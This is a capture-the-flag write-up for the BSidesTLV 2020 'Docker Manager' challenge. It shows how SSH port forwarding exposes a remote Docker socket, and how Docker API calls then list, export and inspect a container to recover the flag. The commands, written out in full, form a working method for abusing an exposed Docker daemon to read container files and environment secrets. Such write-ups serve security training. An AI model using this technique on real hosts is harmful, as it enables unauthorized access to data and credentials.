Docker Manager
- Category: Misc
- 350 Points
- Solved by the JCTF Team
Description
Solution
We connect to SSH server using sshpass -p 'd0ck3rm4n4g3r' ssh [email protected] -p 8000 and immediate get the following screen:
In this screen we can try to enter a password, however we don't know what the correct password is.
We can't seem to kill this application or execute anything interesting within it.
At some point, the following hint was published by the organizers:
SSH + Docker = :broken_heart:
Indeed! using SSH Tunneling we can expose the Docker Deamon Socket which allows using the Docker API.
We can create the tunnel by running the following command:
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# sshpass -p 'd0ck3rm4n4g3r' ssh -N -L localhost:9999:/var/run/docker.sock [email protected] -p 8000This means that when we access our localhost at port 9999, the request will be tunneled to the remote host at port /var/run/docker.sock.
Let's try this:
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/version | python -m json.tool
{
"ApiVersion": "1.40",
"Arch": "amd64",
"BuildTime": "2020-03-11T01:29:16.000000000+00:00",
"Components": [
{
"Details": {
"ApiVersion": "1.40",
"Arch": "amd64",
"BuildTime": "2020-03-11T01:29:16.000000000+00:00",
"Experimental": "false",
"GitCommit": "afacb8b",
"GoVersion": "go1.12.17",
"KernelVersion": "4.19.104-microsoft-standard",
"MinAPIVersion": "1.12",
"Os": "linux"
},
"Name": "Engine",
"Version": "19.03.8"
},
{
"Details": {
"GitCommit": "7ad184331fa3e55e52b890ea95e65ba581ae3429"
},
"Name": "containerd",
"Version": "v1.2.13"
},
{
"Details": {
"GitCommit": "dc9208a3303feef5b3839f4323d9beb36df0a9dd"
},
"Name": "runc",
"Version": "1.0.0-rc10"
},
{
"Details": {
"GitCommit": "fec3683"
},
"Name": "docker-init",
"Version": "0.18.0"
}
],
"GitCommit": "afacb8b",
"GoVersion": "go1.12.17",
"KernelVersion": "4.19.104-microsoft-standard",
"MinAPIVersion": "1.12",
"Os": "linux",
"Platform": {
"Name": "Docker Engine - Community"
},
"Version": "19.03.8"
}We have contact! Now, let's enumerate the containers:
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/containers/json | python -m json.tool
[
{
"Command": "docker-entrypoint.sh /usr/sbin/sshd -D",
"Created": 1593249326,
"HostConfig": {
"NetworkMode": "docker-manager_default"
},
"Id": "ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d",
"Image": "docker-manager_challenge",
"ImageID": "sha256:f2def1180f982e1c9955725a219ce8532d305ae6e01e66c9643f7dbe0c3ad8f7",
"Labels": {
"com.docker.compose.config-hash": "0345033b5a07fe9cd165abbf678cd54dbc8a05ae93d1f715eafab117973e436c",
"com.docker.compose.container-number": "1",
"com.docker.compose.oneoff": "False",
"com.docker.compose.project": "docker-manager",
"com.docker.compose.project.config_files": "docker-manager/docker-compose.yml",
"com.docker.compose.project.working_dir": "/mnt/e/Projects/BSidesTLVCTF/ctf20/dockerfiles/docker-manager/api/docker-manager",
"com.docker.compose.service": "challenge",
"com.docker.compose.version": "1.25.5",
"desktop.docker.io/wsl-distro": "Ubuntu-20.04"
},
"Mounts": [
{
"Destination": "/var/run/docker.sock",
"Mode": "rw",
"Propagation": "rprivate",
"RW": true,
"Source": "/run/desktop/mnt/host/wsl/docker-desktop-bind-mounts/Ubuntu-20.04/71329c4cc6e32171553fa81d044eb31d1a3aac52ba9376c4a99f4505c494cf5b",
"Type": "bind"
}
],
"Names": [
"/docker-manager_challenge_1"
],
"NetworkSettings": {
"Networks": {
"docker-manager_default": {
"Aliases": null,
"DriverOpts": null,
"EndpointID": "d51f6464dfb631039c8a278f671cf68ae2615048f4f279d9ee1a761397871179",
"Gateway": "172.29.0.1",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"IPAMConfig": null,
"IPAddress": "172.29.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"Links": null,
"MacAddress": "02:42:ac:1d:00:02",
"NetworkID": "0f2a5ae4391f59b48cb8a5dd2344b2b304bea6a3497c8ab0fd0cbc3029616c4e"
}
}
},
"Ports": [
{
"IP": "0.0.0.0",
"PrivatePort": 22,
"PublicPort": 2222,
"Type": "tcp"
}
],
"State": "running",
"Status": "Up Less than a second"
}
]Solution 1:
we can download the container and grep the flag :-)
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl 127.0.0.1:8080/containers/ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d/export > image.tar
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# mkdir image
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# tar -xf image.tar -C image
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# grep -Ri BSidesTLV image
image/app/flag:BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}Solution 2:
We have one container, let's view its details and search for the flag:
root@kali:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/containers/ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d/json | python3 -m json.tool | grep -i bsides
"FLAG=BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}"
"com.docker.compose.project.working_dir": "/mnt/e/Projects/BSidesTLVCTF/ctf20/dockerfiles/docker-manager/api/docker-manager",The flag: BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}